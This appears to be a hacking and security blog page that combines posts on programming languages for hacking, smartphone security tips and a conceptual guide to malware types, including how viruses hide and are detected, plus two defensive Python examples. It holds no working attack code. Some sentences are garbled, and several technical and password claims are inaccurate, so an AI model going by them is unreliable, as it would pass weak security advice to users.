2020
All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

 

Best Programming Languages To Learn For Hacking


Before I get into this article, it's very important to recognize that hacking can be dangerous. Don't do it unless you know what you're doing and you know that what you're doing is legal. Whenever you practice hacking, it should be done responsibly and ethically, or else you could end up in prison or, worse, in financial turmoil, and then you'd be in debt. Like the government.

There are three fundamental types of hackers: white hat, black hat, and grey hat.

A white-hat hacker is somebody who hacks ethically and responsibly and they use their skills to help catch other hackers. They're also often hired by companies to handle security measures, and build anti-hacking software, which is really important and vital work in the world of information technology, especially now that everything is becoming attached to the Internet of Things. 

Then, of course, we have the black hat hackers, people who use their skills with malicious intent: things like creating viruses, using keyloggers to steal your information, hacking banks, and even hacking servers. Their goal is to break in, steal information, and sell it for money.

Really, nobody likes those guys, because they negatively affect everyone for the benefit of themselves. 

Last but not least, we have the grey hat hackers, people who find themselves somewhere in between. These are usually people that don't have malicious intent. But everything they do is usually self-beneficial.

In general, they auction their abilities to the highest bidder. A grey hat hacker will often look for backdoors and security problems with the system, and then they'll sell the solution to the company for a price.

Before I can really talk about what language is the best for hacking, you first have to understand that there are different types of hacking. The language and system you use for a server is not necessarily the same that you'd use for a personal computer. Before you look for any absolutes in what you should or shouldn't be using, you should recognize that there are many different types of hacking because there are many different types of computer systems.

Because of this, there are many different languages you could utilize to hack any individual system. There are really two different levels of hacking: high-level hacking and low-level hacking.

On the high end of the spectrum, we have the easier-to-use languages, often interpreted or intermediate: Python, Ruby, JavaScript, Java, C#. Because these languages aren't compiled, they're much easier to work with, because everything is compiled on the fly.

A language like Java is both interpreted and compiled. This allows it to be incredibly easy to work with. That's why a lot of hackers prefer it, not to mention most of the world's servers run on it.

However, Java is really only useful if you're hacking servers and people's back-end computer systems. Let's say you want to hack a robot, or an electronic device, maybe even a car, the only way to do that is with a lower-level language. 

On the lower end of the spectrum, we have compiled languages like C and C++. And although they're not as easy to use, they are more powerful.

There's very little you can't do with C or C++.

What I wanted to show you is a hierarchical ladder, from the hardware all the way up to the highest levels of abstraction. Here we have the CPU, or the hardware itself, which obviously runs on electricity, with hardware components using zero- and five-volt signals to determine what to do internally.

The 0 in machine language, or binary, represents false, which is nothing, and the 1 represents true, or five volts. On top of binary, and just a little bit abstracted from it, is assembly. It's really the lowest-level human-readable, writable language. Assembly, or assembler, is a platform-specific language designed for a certain architecture.

So Mac and Windows may not necessarily have the same assembler because their architecture usually differs. 

But we're not going to get into the different types of assembly and assemblers because that's really beyond the scope of this article.

From here we go up to what is likely the lowest-level language still in common use today. And that's C. C is really close to the hardware for a practical language.

But it doesn't offer many abstractions that people often desire today, such as object-orientation. Because it doesn't offer many of these modern features, the language is more streamlined. 

And one might even argue easier to grasp at first, mostly because it has less bloat. It's strange because C is really easier to learn than most languages in some respects, but it's harder to master. 

And there's sometimes more to know about it, especially because the systems we control with it are generally a lot more complex. However, these days there aren't really a lot of languages other than C that retain that low-level ability to program microcontrollers and things of the sort.

C is a procedural language, and it was really the first language I ever learned. I'm glad I started with C, though, and if you have a good mind and enjoy reading and studying things for yourself, then I do highly suggest starting there.

There's really no language on a computer that comes even close to being as supported on as many devices as C and its use is still just as relevant today as it was years ago when I was first introduced. 

It's wild to think how much hardware has changed in that time. But languages really haven't evolved much at all. C is still the world's fastest-compiling language supported on multiple systems, due to that really low overhead.

Then we shift a little from here to C++, which is basically C but with object-orientation added to it, and a ton of features.

Nobody really uses C++ is a wonderful language. But many people who use it, especially for lower-level microcontroller engineering or game hacking, will tell you a lot of the features it has come with cons that kind of outweigh the benefits.

C++ is great if you need low-level control and also that object orientation and extra abstractions. But if you're just looking for something that compiles fast and has the smallest package possible, you're definitely looking for C.

It's funny, because the design of a virus, or hacking, actually has many of the same requirements as traditional programming and development. Ordinarily, packaging something really small means quicker delivery to a customer. Well, when you're designing a virus, you take the same exact things into consideration: you want something that's really small and fast and easy to pass in packets over the internet.

 

Then we get to the intermediate hybrid languages, which are compiled but also interpreted: languages like C# and Java. And we get Apple's new, wonderful, high-level protocol-oriented language, Swift.

And of course, this list wouldn't be complete without the high-level abstracted languages that basically everybody is learning and using right now for almost everything. 

These are designed for ease of use, but at the expense of control, like JavaScript, Python, Ruby, and so on. Don't get me wrong, these are still very powerful, real programming languages that can do some serious business. 

They're just not designed for low-level micro-controller engineering and programming. 

At the very top here we have HTML and CSS, which, contrary to what many people will tell you, are absolutely programming languages. They may not use logic to the same extent as a lower-level programming language, but effectively, they're designed for ease of use on the web.

And they do meet every criterion to be considered a programming language, which is really just a set of instructions telling the computer what to do.

In short, don't be a fool. Every language has its use, I just think C has the most uses. Some people obsess over what language to use for hacking. 

And although it is important, the operating system is just as important. Most hackers use Linux for good reason. Linux is highly modular and portable by nature. And it supports a vast array of tools for hackers. 

That probably helps. If you're not yet familiar with the Linux operating system, that might be a good place to start before you get into programming. The biggest part of being a hacker isn't even knowing a programming language.

It's simply understanding how the systems work underneath the scenes. Once you understand how things work below, you can break in from above. Being a hacker is all about trial and error.

Sometimes you have to try many things until you get something that works. And often you never do. But this process of trial and error is precisely why so many people love it. It's an incredibly rewarding experience when you break code that somebody else has made. In many ways, it's competitive, like a sport.

Many people would think that hacking isn't that useful. But the truth is, it's fundamentally necessary to the electronic environment. If we didn't have white hat hackers, and even gray hat hackers, we wouldn't have the ability to defend ourselves against the black hat hackers. 

It's extremely important that every time you're on your phone and you take a selfie or picture, it's safeguarded. And only you can see it. Oh, yeah. Yeah, right there. Yeah, just like that. This is only possible because of the talent and amazing skills of ethical hackers. 

It's my opinion that if you're new to programming, C is probably the best place to start. Not only is C cross-platform and used on almost every system in the world, but it's also the foundation of almost every programming language today. Whether you go on to learn C++, Swift, or Java, almost every modern language in the world is heavily influenced by C.

Even JavaScript, which is now the most used and popular language in the world, takes a huge amount of influence from C. That's why we refer to most languages as C-style languages. C teaches you the foundations that you need to do whatever it is that you want to do. Hacking included.

Most servers and systems today are designed on software that's written in modern languages, such as Java and C#, but most of the microcontrollers and hardware running those systems and software are designed on C.

So if you really want to get low and close to the hardware, C is the best place to be. Even if your goal is to be a general-purpose programmer, learning C can look incredibly good on your resume. I highly suggest checking C out.

And if it's not for you, try a different language, something higher level. We live in an age where the security of your information is more important than ever, as the world around us becomes more and more digitized.

It's more important than ever to safeguard our information and identity. When we see hacks like the recent Equifax hack, we know just how dangerous hackers can be, from birth certificates to banking information and even your social security number. Black hat hackers are a reality of life. You cannot escape it.

Where there is information, there are people trying to steal it. So the only way to control it is to fight fire with fire and find hackers that are willing to do it for ethical purposes. It's because of the hard work of ethical hackers that security measures are even possible. To summarize, learn C. And if you can't, learn Python or JavaScript,


People are using smartphones more than ever, and this trend isn't slowing down anytime soon. Whether you're new to smartphones or not, you should know that they can be a huge target for hackers. Smartphones contain a lot of your personal information, which can give someone else all they need to steal your identity or your digital data.

    17 Tips To Secure Your Mobile Phone From Hackers

    Smartphone hacking is a profitable enterprise because hacking into smartphones is simple, and because it's so rewarding. Your phone is an integral part of your life, so much so that access into your phone is access into your mind.

    1. Strengthen your password

    Some of us might look back at the good old days when a password was a few characters long, was easy to remember, and didn't need to look like something that spilled out of the Matrix. Unfortunately, these days it's too easy to guess a standard password, so it needs to be uncrackable. Here are some tips for making your password a little stronger.

    • Combine old passwords with a new one to get supercharged passwords. You can add the name of your favorite animal or food with the year you first knew that; add that on to the end of any password you already have to make your password uncrackable. Since most social media sites allow up to 15 characters for passwords, keep your login original. Characters and numbers are fine, but adding symbols and other special characters can really take your password up a notch.

    2. Device encryption

    This one is apparently enabled by default. To double-check, search for "encrypt device" in your Settings app and follow the directions. On older Android devices, you should have your device charged and plugged in during encryption, and set and remember a password.

    You should additionally set up your device to delete all the data on your phone after too many incorrect tries. This protects your device from brute-force attacks when somebody gets physical access. Encrypting your phone does not protect you from malware or remote exploitation of the device; it only works if a phone gets stolen.



    3. Be smart on social media sites

    Social media isn't nearly as private or protected as you may think. In the old days you could easily block people from looking at your information, but with the size of Facebook, it's rare that your profile is truly private. To maximize your safety, always choose the settings that only allow your friends and family to see your posts and pictures, unless you know someone who wants to be your friend.

    Be cautious about accepting friend requests. Fake profiles can fool you into thinking you know that person. A quick look at their friend list and recent posts tells you if they're active in a group or not. Never look at a message or a friend request with links that look and feel fishy. Some sneaky hackers can copy friends' emails and send messages with links, hoping you'll press the link. By the time you do, you'll be suckered into giving up the info you didn't want to be stolen. Worse yet, you could be locked out of your own profile account if they steal your password too, so always be on the lookout for suspicious messages.

    4. Enable 2FA (Two-Factor Authentication)

    Enabling 2FA can double your security, especially if combined with a strong password. Always enable 2FA for your social media and important sites, so if your password gets compromised you have an OTP to secure your account from hackers.
     

     

    5. Don't use open or public Wi-Fi

    Free high-speed WiFi is something that only a few can resist, but this WiFi is lurking with some very serious dangers you need to be aware of.

    Clicking on a link or popup from free WiFi can be very serious. If a hacker is also using that WiFi, he can hijack your sessions and do whatever he wants from your accounts, or use tools to find credentials.

    This can be used for identity theft, and all your information is being used by the wrong person. Disable your WiFi and network also for safety, and use a password, of course.

    Using a VPN and Tor can also work; they hide your identity from ISP and browsers.


    6. Add more protection

    Just like your home computer, you need a good firewall to protect your internet connection. Luckily, new phones do a bit more than that: every phone has its own firewall, though you can always add more security apps to be doubly sure, as an added measure.

    Some apps work better for Android than they do for iPhone, but there's plenty of software available. A quick look through the Apple Store or Google Play app list will get you started. Some app names such as Norton, Avast, and McAfee are your best

    It doesn't hurt to add this extra protection to your phone. Firewall apps protect you from select dangers to help keep your ID and info safe, while others just target viruses. When it comes to overall coverage, find an app that offers complete packages. Choose what's best for you.

    7. Don't answer fishy and scammy unknown numbers

    The only scams we used to encounter were rudimentary email scams that were incredibly obvious. Who would fall for that these days? Well, suffice it to say it's still happening to those who own a smartphone.

    Did you ever get a missed call with an area code you don't recognize? While most of these get blocked by your phone automatically, some can slip through. Chances are, if you call back that number, you'll be sorry you did. The trick is that your call is routed through an international premium-rate number, which can charge you way more than your monthly bill, and it's more common than you think. If you call back that number, the cost of the call gets paid to the hackers. These one-ring calls are the typical sign of this scam, made so you'll think you missed an important call. Don't be sucked into losing your money: just erase or block the number, and you won't be called by that number ever again. Hopefully your smartphone will block other calls from that same area code as well.

     

    8. Use cloud storage

    Cloud storage allows you to store important information and files in a location that's not on your phone. This can be smart because it means the files aren't located on your phone: if your phone is lost, stolen, or damaged, you won't lose any of the data in cloud storage.

    Most importantly, this means your information can be kept out of the hands of hackers. Cloud accounts are pretty hard to crack, so even if you have an account on your device it'll be safe. These accounts often have double password encryption so no two login attempts are the same. You might need a second login code sent to your mobile number to complete a cloud login. This keeps hackers from getting the information you want to keep private.

    While it might seem odd to put private information into cloud storage, it's not such a bad idea. Having a mobile device clutter-free when you use it for business means you don't have to worry about misplacing files or running out of storage. This also helps you travel light wherever you go, and you won't have to worry about losing your pen drive that could fall into the wrong hands.

    Secure cloud backup and syncing: if you're using backups or syncing, make sure they are encrypted as well. Cloud backups are oftentimes an easy target for stealing your private data. Secure your accounts with 2FA. If you use Google Drive or iCloud, your cloud backups use the same 2FA as your main Google account or Apple ID connected to your phone. If you decide to trust your default providers, you're not in control of the security of your data. The provider holds the decryption keys and can access your data in iCloud any time they want, and I think only you should be able to decrypt your data. Cryptomator allows you to create encrypted vaults and automatically sync your secure backups to the cloud service of your choice. If you don't pay for the service you are so I would recommend going for Nextcloud. You can get between two and five gigabytes of cloud storage for free, which might not be enough for those of you taking plenty of high-resolution photos, but Nextcloud is free and open-source, and many providers even offer instant encryption, so this is the cloud service that you should go for.


    9. Check app permissions

    All apps have settings that allow app permissions, which tell the app what it can and can't do when it's connected to the Internet. Some of the common options include whether an app can access your photos, contacts, camera, and microphone.

    This is really important, as you might not want your audio or visual gadgets to be used by other people. These settings also control the amount of info given about yourself and the information that's stored on your phone. If these app settings are set up to your approval, then you won't have to worry about that info being leaked. Often some hackers target certain apps that don't have secure internet connections. Your live images could be stolen through your phone or tablet, and you never know where they could end up after that. Worse yet is that your private info can be sold to marketing agencies who will target you just from your mobile search history. No, it's not just Facebook that does it; numerous third-party app pirates like to sell your private info too. This can be avoided by checking your app permission settings on every app you decide to download.


    10. Watch out for phishing apps

    By now you have a good idea what phishing means, and those who get hooked weren't being careful. Online game apps look attractive and have lots of flashy advertising, which is a bit like a worm on a hook.

    If you ever knew someone who likes sport fishing, they use special bait to lure and catch their fish. The same works for game apps that tempt you with flashy graphics before taking your information. You'll know when you see these apps because they aren't on the official app sites such as Google Play or the Apple Store. Often they're traps that show up on rabbit-hole web sites.

    This is where you click on a link to a second web site, which takes you through a string of different web sites. You never actually get to the web site that you're looking for. It can seem endless at times, and this is where you start to see very familiar app game links. These are usually copycat games that look just like the official ones, but they're not. They trick you into giving up all sorts of information to play the game. They can also hack your phone, giving them access to your private info for them to exploit. Don't ever fall for this kind of phishing bait.


    11. Activate your phone's security features

    New mobile devices give you lots of choices to protect you from getting hacked. There isn't a smartphone out there today that doesn't have software filters that spot apps or files with dangerous malware.

    This is similar to software on computers, which will prevent you from installing software that is detected to be unsafe. Antivirus blockers for apps are easy to turn on inside your smartphone settings. They're specifically designed to look for malware in app games. If a game doesn't download, chances are the app could be harmful to install.

    This is also great for kids who might not fully understand the apps they're clicking on or downloading. Once again, if your device thinks it's not good for downloading, you don't want to risk being hacked. Make sure you stick with official games that come from sources that have already screened their app games. But even Google Play and Apple Store apps can have malware that's hidden somewhere, so always activate your virus app blocker to be on the safe side.

    12. Go beyond passwords

    Having your smartphone stolen is about the worst thing you can imagine. Then again, if they can get into your phone because you don't have a password set up, you're in real trouble. Fortunately, there are some innovative things you can do to prevent thieves from getting your information too easily.

    New apps and models now allow fingerprint identification to unlock a phone. For it to work, you press a touch screen window, holding your finger down. If your print doesn't match the exact image that's stored in the phone's memory, it won't open. This can also be combined with a two-step process that uses a fingerprint and a password. In addition, you should also install a mobile tracker. This can be activated as soon as you notice your phone is missing. An owner can then track their phone via the app and catch whoever is carrying the stolen goods. Some apps will even allow you to delete the info that's stored on the phone in an emergency, but as long as you can get your phone back in one piece, that's probably the best solution. Better call the police for help once you finally track down your phone.


    In this article, I'll be discussing a series of lessons on Cyber Security, with today's topic focusing on malicious code, which is also known as malware.

      What is Malicious Code (Malware Definition)?

       Malicious code, or malware, is software that is written for the purpose of intentionally causing some sort of unanticipated or undesirable effects.

       

      Note that the terms malicious code, rogue program, and malware all refer to the same underlying concept, and I will hence use these terms interchangeably. 

      From a conceptual perspective, one of the most critical things to understand about malicious code is that it is only distinguished from other types of software programs by the intent of its developer.

      If a developer writes a software program with the goal of causing harm to other people or systems, or at least problems for other people or systems, then we can classify that software program as malicious.

      Since the only conceptual difference between malicious software programs and non-malicious software programs is the intent of the developer, it's important to realize that malicious programs can do anything that a normal non-malicious program can do.

      Just as with a normal non-malicious program, malicious software programs can access and use system resources and can alter both data and other programs residing on a system if that's what they've been designed to do.

      Many people have the impression that malicious code is a relatively new concept. In fact, researchers have been aware of malware threats for many, many decades. Virus behavior, for example, was described by Willis Ware as a threat to computing systems in his 1970 study for the Defense Science Board. Remarkably, many of the concerns and threats that were documented in this early report are still perfectly valid even today.

      Malware (Malicious Code) Full Guide (Viruses,worms,etc)


      Many different types of software programs can be classified as malware, with some of the most common types of malware being viruses, worms, Trojan horses, zombie programs, logic bombs, time bombs, rabbits, trap doors, and script attacks.


      Perhaps one of the most well-known types of malware is a virus. 

      What is a Virus?

      In the context of information security, a virus is a hidden, self-replicating computer program that propagates itself by infecting other programs or system memory.

      Note that viruses can be broadly classified into two groups: transient viruses and resident viruses.

      Transient viruses are those viruses that are active only when their host programs are executing, while resident viruses are those viruses that establish themselves in system memory and have the ability to remain active even after their host programs have been terminated.

      We'll examine viruses more closely a bit later. 

      What are worms?

       Although a worm and a virus have many similarities, a malware worm is distinguished from a virus by its ability to propagate a complete working version of itself onto another machine or device by means of a network. 

       

      What is a Trojan Horse?

       A Trojan horse is a computer program that appears to have a useful function, but which also has a hidden and malicious purpose.

      Trojan horses are commonly able to evade security mechanisms by exploiting the legitimate authority of the user who runs the program. 

      Imagine, for example, that you downloaded a game app for your smartphone. When you launch the app, you're able to play the game. But unbeknownst to you, the app has secretly made a copy of all of the information in your contacts list and has transmitted that information to a remote server. 
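The game app in this scenario is what a permission review is meant to catch, the same check the phone-security tips earlier on this page describe under app permissions. As an added example (not code from the original article), the Python below audits a decoded AndroidManifest.xml against an assumed per-category baseline; the sample manifest, the `EXPECTED_BY_CATEGORY` table and the function names are constructed for illustration, while the permission strings are real Android permissions.

```python
"""Flag sensitive Android permissions that an app's stated purpose does not explain."""
import xml.etree.ElementTree as ET

# Namespace Android uses for manifest attributes such as android:name.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
PERMISSION_TAGS = ("uses-permission", "uses-permission-sdk-23")
INTERNET = "android.permission.INTERNET"

# Android permissions guarding the kinds of data the article names.
SENSITIVE = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_EXTERNAL_STORAGE": "photos and files",
    "android.permission.READ_MEDIA_IMAGES": "photos",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
}

# ASSUMPTION: an illustrative baseline of which sensitive permissions each
# app category can justify. A real review would tune this table.
EXPECTED_BY_CATEGORY = {
    "game": set(),
    "camera": {
        "android.permission.CAMERA",
        "android.permission.RECORD_AUDIO",
        "android.permission.READ_MEDIA_IMAGES",
    },
    "messaging": {
        "android.permission.READ_CONTACTS",
        "android.permission.CAMERA",
        "android.permission.RECORD_AUDIO",
        "android.permission.READ_MEDIA_IMAGES",
    },
}

# Constructed sample: a decoded text manifest for a hypothetical puzzle game.
# (Manifests inside an APK are binary XML and must be decoded to text first.)
SAMPLE_GAME_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.puzzlegame">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission-sdk-23 android:name="android.permission.RECORD_AUDIO"/>
    <application android:label="Puzzle Game"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return the set of permission names the manifest asks for."""
    # xml.etree is not hardened against hostile XML; for manifests from
    # untrusted sources, parse with the defusedxml package instead.
    root = ET.fromstring(manifest_xml.strip())
    found = set()
    for tag in PERMISSION_TAGS:
        for node in root.iter(tag):
            name = node.get(ANDROID_NS + "name")
            if name:
                found.add(name.strip())
    return found


def audit(manifest_xml, category):
    """Compare requested permissions with what the app category can justify."""
    if category not in EXPECTED_BY_CATEGORY:
        raise ValueError("no baseline for category: " + category)
    requested = requested_permissions(manifest_xml)
    expected = EXPECTED_BY_CATEGORY[category]
    unexpected = sorted(
        p for p in requested if p in SENSITIVE and p not in expected
    )
    return {
        # (permission, kind of data it exposes) pairs the category does not explain
        "unexpected": [(p, SENSITIVE[p]) for p in unexpected],
        # Sensitive data plus network access means the data can leave the
        # device, which is the contacts-to-remote-server case in the text.
        "can_send_off_device": bool(unexpected) and INTERNET in requested,
    }


if __name__ == "__main__":
    report = audit(SAMPLE_GAME_MANIFEST, "game")
    for permission, data in report["unexpected"]:
        print("unexplained access to " + data + ": " + permission)
    if report["can_send_off_device"]:
        print("app also has network access: review before installing")
```
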

      Aside from viruses, worms, and Trojan horses, several other types of malicious code exist as well.

      What is a Zombie?

      A zombie, for example, is a malicious program that is designed to allow a computer to be controlled remotely by a master machine.

      Computers that have been turned into zombies are often used by malicious parties for purposes such as launching a distributed denial-of-service attack against a target organization or network.

      What is a Logic Bomb?

       A logic bomb is a type of malware program that is designed to activate itself when certain conditions are met.

       One of the most popular types of logic bombs is called a time bomb, which is a logic bomb that activates at a specified date or time.

       Time bombs can be used by malicious parties for purposes such as launching a distributed denial-of-service attack on a holiday or on the anniversary of some event.

      What are Rabbits?

      With respect to viruses and worms, a rabbit is a virus or worm that replicates itself without limit for the purpose of draining or exhausting system resources. 

      In the real world, rabbits are well known for their proclivity to reproduce in large numbers. If the population of rabbits is constrained to an area with a limited supply of resources, eventually the rapidly growing number of rabbits will consume all of the available resources.

      One of the characteristics of computer systems is that they also have limited resources. And I hope this example makes it clear why a virus or worm that replicates itself without limit is known as a rabbit. 

       What are Trap doors or Backdoors?

       Trap doors, which are also known as backdoors are hidden software devices that are installed by a malicious party in order to gain surreptitious access to a computer system while avoiding or circumventing the system security mechanisms. 

       

      What are Script attacks?

       A script attack refers to malicious code that has been written in a scripting language such as JavaScript and that is designed to be downloaded and executed when a user loads a webpage. Script attacks capitalize on browser vulnerabilities, or the web's same-origin policy, in order to gain access to sensitive or private information. Script attacks are quite popular and have been found by recent research to account for at least 80% of the security vulnerabilities on the web.

      There are, of course, many other varieties of malicious code. But the nine types of malware described previously provide a solid representative sample of current malicious-code-based threats.

       Although many malware programs are indiscriminate, that is, they are not selective in the people or systems that they attack, it's important to realize that there are also many targeted malicious programs that have been written for a very specific purpose.

      What is a Targeted Malicious Code?

      Targeted malicious code might be designed to attack a particular system, organization, application, or network, or to carry out a very specific malicious task. 

      An excellent example of targeted malicious code is the Stuxnet worm, which was specifically designed to infect the programmable logic controllers on the Siemens industrial control systems that were being used by the Iranian government in its efforts to enrich uranium.

      A useful way of studying and classifying malicious software programs is to evaluate those programs from four different perspectives. 

      • We can consider the extent to which a malware program causes harm, and we can accomplish this by determining how the program negatively impacts users or systems. With respect to harm, remember that malware programs often run with the full authority of the user. If a user has high-level system access, malware programs can hence cause essentially unlimited harm to a system.  
      • We can consider the way in which a malware program transmits or propagates itself, and we can accomplish this by determining how the program replicates and spreads. Malicious programs can potentially transmit and propagate themselves in many different ways, including via files, downloads, documents, scripts, networks, and so forth. 
      • We can consider the ways in which a malware program becomes active, and we can accomplish this by determining how the program establishes itself and gains control of system resources. Many different activation vectors exist for malicious programs, and most of these exploit some sort of system vulnerability.
      • We can consider the stealth characteristics of a malware program by determining how the program hides itself to avoid detection. In order for a malicious program to survive, it must avoid being detected not only during the installation process but also while it is executing and while it is dormant or inactive. Further, once a malicious program has been detected, instances of the program must be removed faster than the program can propagate itself if we hope to cleanse the infection. 

      As promised, we will now take a closer look at how computer viruses work. 

      Recall that a virus is a hidden self-replicating computer program that propagates by attaching itself to other programs. This means that the host program to which a virus is attached must be executed at least once in order for the virus to spread. Recall also that a certain type of virus, known as a resident virus, can establish itself in system memory and can remain active without its host.

      For this reason, even a single execution of the host program can be sufficient to spread the virus widely. 

      Let's consider a few examples of virus propagation. 

      First, imagine that a virus is attached to a program installer file. A user will hence activate the virus when he or she runs the installer program. After being activated, the virus might install itself in all of the programs currently executing in the system's memory. From this point, the virus will spread further whenever any of the infected programs is executed. 

      As another example, imagine that a virus is contained in an attachment to an email message. In this case, the user might activate the virus simply by opening the attachment. From this point the virus can install itself and spread throughout the user's machine.

      Classification of Viruses

       Viruses can be classified into four different categories according to the ways in which they attach themselves to their host programs. 


      • Appending viruses

       An appending virus attaches itself either to the beginning or to the end of a host program's code. 

      Most often, appending viruses insert themselves into an executable host program in front of the first legitimate program instruction. In this way, the virus code will run whenever the program is executed. 

      • Surrounding viruses

       A surrounding virus attaches itself to its host program in such a way that it will execute both before and after the host program executes.

      Developers of surrounding viruses often use this strategy in order to allow the virus to cover its tracks. That is, the component of the virus that runs after its host program has finished executing can be used to mask the presence of the virus. 

      • Integrating viruses

       Integrating viruses incorporate themselves into the middle of a host program's legitimate program instructions, thus defeating antivirus software that looks for virus signatures at the beginning or end of an executable program file. 

      • Replacing viruses

       Replacing viruses are designed to entirely replace the real, legitimate code of the infected program file.

                                                      --------    

      The Perfect Virus...

      From the perspective of someone wishing to design a virus, there are several highly desirable virus characteristics that the designer can seek to incorporate into his or her virus. 

      An ideal virus should be difficult to detect, not easy to destroy or deactivate, and should propagate itself widely and rapidly. 

      Further, an ideal virus should be able to reinfect programs that have previously been infected and should be machine and operating system independent. 

      With respect to the latter of these considerations, imagine how effective a virus would be if it had the capacity to infect any type of device, including smartphones, tablets, PCs, and servers, running any type of operating system, be it Windows, Mac OS, Linux, Unix, iOS, Android, or so forth.

       

      Now that we know a bit about how computer viruses attach themselves to their host programs, we can consider the question of 

      where to hide a virus?

      • Viruses can be hidden in many places on a computer system, including the boot sector, in the system's memory, in application programs, in library files, and in many other widely shared files and programs. Arguably the best place for a virus to be hidden is in a machine's boot sector.


      • A boot sector is a region of a storage device that contains program code, which allows a computer to load its operating system. When a computer is powered on, the BIOS loads the program code from the boot sector into the computer's memory. The computer then executes this program code in order to initialize its operating system and complete the boot-up process. 
      • Since virus-detection programs are application programs, the operating system must be running in order for a virus detection program to be running. By hiding a virus in the computer's boot sector, then, the virus may be able to avoid detection, since it will have been activated before any virus detection programs were activated. 
      • Another common place for viruses to be hidden is in system memory. On modern computing devices, it is common for hundreds of programs to be executed upon system startup. 
      • If any of these programs are infected with a virus, the virus might propagate by attaching itself to the other programs currently contained in the system's memory. In this way, even if the original host program is terminated, the virus will continue to be active.

       Operating System programs or common user programs are good targets for this type of virus since such programs are likely to be activated often. In addition to hiding viruses in the boot sector or in system memory, viruses can also be hidden in application programs. 

      There are certain applications that allow users to write and execute macros, and these macro-enabled applications have proven to be common targets for viruses, since clever virus developers have been able to exploit security flaws in those applications in order to propagate and run malicious code.

      • Library files such as DLL files are also a common target for viruses because they are used by or shared by many different programs. When any of the programs that rely upon one of these shared library files are activated, the virus in the infected library file will also become active, thus allowing it to rapidly propagate. Other widely shared files and programs may also be good targets for a virus. 

      It's possible for example, for a virus to be hidden inside of a data set that is shared by many users, thus allowing the virus to spread quickly. 

      • Another interesting place to hide malicious code is inside digital images such as JPEG files. There is in fact an entire science, known as steganography, which examines how information can be concealed. Many methods and tools have been developed in recent years, which allow malicious code and other information to be secretly hidden inside common types of computer files. And these files are thus good targets for viruses. 
      • Finally, and amusingly, a good place to hide a virus might be inside of a disreputable virus detection program. Users who acquire and activate such a program in the hopes of preventing a viral infection may by doing so, actually cause their system to become infected. 

      Virus Signatures and its Pattern

      In order to understand how viruses are detected, we first need to understand that viruses leave behind a unique signature, which can be defined by one or more patterns. 

      If a virus is to survive a hard reboot, that is a reboot in which the power to the computer is switched off and then switched back on, it must be stored somewhere on the computer's non-volatile storage device, such as a hard disk or a solid-state drive. 

      This creates a storage pattern for the virus. Further, a virus interacts with system resources in a particular way while the virus is running. 

      And these interactions create an execution pattern for the virus. Finally, a virus spreads or propagates itself in a particular way, thus creating a distribution pattern for the virus.

       Virus scanning programs use one or more of these types of patterns in order to detect viruses. Such software programs may scan the system's memory, or its hard disks or solid-state drives, including the boot sector, in an effort to detect any virus activity on the machine. Additionally, virus scanners can use techniques such as file checksums in order to detect changes to important files.

      Virus Scanning and Removing Programs...


      When a virus scanning program finds a virus, it will typically try to remove it by extracting all of the pieces of the virus from its host programs and from the system's memory. 

      One of the major challenges faced by virus scanning programs is polymorphic viruses, which are designed to modify their signatures as they execute in order to avoid detection. 

      Note that there are typically hundreds of new viruses identified every day. And as such a virus scanner and its database of virus signatures must be kept up to date in order to be effective. 
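
      The storage-pattern matching described above, as an added example (not from the original article or from any real antivirus product): a byte-signature matcher with wildcard positions, run over constructed, harmless buffers. It shows why a scanner that inspects only the beginning and end of a file misses a pattern placed in the middle, and why re-encoded bytes no longer match a fixed signature. The signature bytes, names and sample data are all constructed for illustration.

```python
"""Byte-signature scanning over constructed, harmless sample buffers."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

WILDCARD = None  # signature position that matches any byte


@dataclass(frozen=True)
class Signature:
    name: str
    pattern: Tuple[Optional[int], ...]

    @classmethod
    def from_hex(cls, name: str, text: str) -> "Signature":
        """Parse text such as 'DE AD ?? BE'; '??' marks a wildcard byte."""
        return cls(name, tuple(WILDCARD if p == "??" else int(p, 16)
                               for p in text.split()))


def find_signature(data: bytes, sig: Signature, start: int = 0,
                   end: Optional[int] = None) -> int:
    """Return the offset of the first match inside data[start:end], or -1."""
    end = len(data) if end is None else min(end, len(data))
    width = len(sig.pattern)
    for off in range(max(start, 0), end - width + 1):
        if all(want is WILDCARD or data[off + i] == want
               for i, want in enumerate(sig.pattern)):
            return off
    return -1


def scan_full(data: bytes, sigs: List[Signature]) -> Dict[str, int]:
    """Scan the whole buffer; return {signature name: offset} for each hit."""
    hits = {}
    for sig in sigs:
        off = find_signature(data, sig)
        if off >= 0:
            hits[sig.name] = off
    return hits


def scan_head_tail(data: bytes, sigs: List[Signature],
                   window: int = 64) -> Dict[str, int]:
    """Scan only the first and last `window` bytes, as a naive scanner might."""
    hits = {}
    for sig in sigs:
        off = find_signature(data, sig, 0, window)
        if off < 0:
            off = find_signature(data, sig, len(data) - window)
        if off >= 0:
            hits[sig.name] = off
    return hits


# Constructed marker bytes, not taken from any real malware.
SIGS = [Signature.from_hex("DEMO.Marker", "DE AD ?? BE EF 13 37")]
MARKER_A = bytes.fromhex("dead00beef1337")
MARKER_B = bytes.fromhex("dead7fbeef1337")       # differs only at the wildcard
HOST = bytes(range(256)) * 2                     # 512 bytes standing in for a program

PREPENDED = MARKER_A + HOST                      # pattern at the start
APPENDED = HOST + MARKER_B                       # pattern at the end
INTEGRATED = HOST[:200] + MARKER_B + HOST[200:]  # pattern in the middle
MUTATED = bytes(b ^ 0x5A for b in MARKER_A)      # same bytes, re-encoded

if __name__ == "__main__":
    for label, buf in [("prepended", PREPENDED), ("appended", APPENDED),
                       ("integrated", INTEGRATED), ("mutated", HOST + MUTATED)]:
        print(f"{label:10} head/tail={scan_head_tail(buf, SIGS)} "
              f"full={scan_full(buf, SIGS)}")
```

      The re-encoded buffer matching nothing is the reason signature databases are paired with execution-pattern (behavioural) detection and file integrity checks.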

      Virus Removal and Post-infection Recovery

